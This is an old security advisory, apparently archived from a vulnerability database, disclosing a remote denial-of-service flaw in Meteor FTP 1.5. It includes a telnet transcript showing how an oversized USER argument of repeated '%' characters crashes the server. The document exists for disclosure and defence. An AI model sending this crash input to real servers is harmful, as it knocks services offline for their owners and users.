Remote denial of service vulnerability in Meteor FTP Version 1.5

2003-08-10T00:00:00
ID SECURITYVULNS:DOC:4973
Type securityvulns
Reporter Securityvulns
Modified 2003-08-10T00:00:00

Description

www.evicted.org zerash@evicted.org August 8, 2003

Meteor FTP Version 1.5 Remote Denial of Service Vulnerability

1. Introduction

Meteor FTP is a personal ftp server that runs on Windows98/ME/2K/XP.

2. Vulnerability

A vulnerability exists in Meteor FTP Version 1.5, which allows any malicious user to remotely cause a denial of service against the ftp server.

By connecting to the Meteor FTP server and issuing USER followed by large amounts of data, the ftp server will crash.

3. Example

Proof of concept exploit (meteordos.pl) is included in the attachment.

root@openwire # telnet 192.168.1.14 21 Trying 192.168.1.14... Connected to 192.168.1.14. Escape character is '^]'. 220 Service ready for new user USER %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 530 Not logged on QUIT Connection closed by foreign host. root@openwire # telnet 192.168.1.14 21 Trying 192.168.1.14... Connected to 192.168.1.14. Escape character is '^]'. USER anonymous QUIT telnet> quit Connection closed.

At this point the server has completely froze up. On the server side, the Meteor FTP spits out a dialog :

"Error: Access Violation at 0x77FCC992 (Tried to write 0x25252525), program terminated."

By clicking "OK", Meteor FTP terminates.

4. Vendor status

Vendor has been notified, waiting for response...

5. Credits

Vulnerability & code by zerash You can view this advisory at : http://www.evicted.org/projects/writings/mftpadvisory.txt You can view the exploit at : http://www.evicted.org/projects/code/meteordos.pl

6. Contact

Please send suggestions, updates, and comments to : zerash@evicted.org http://www.evicted.org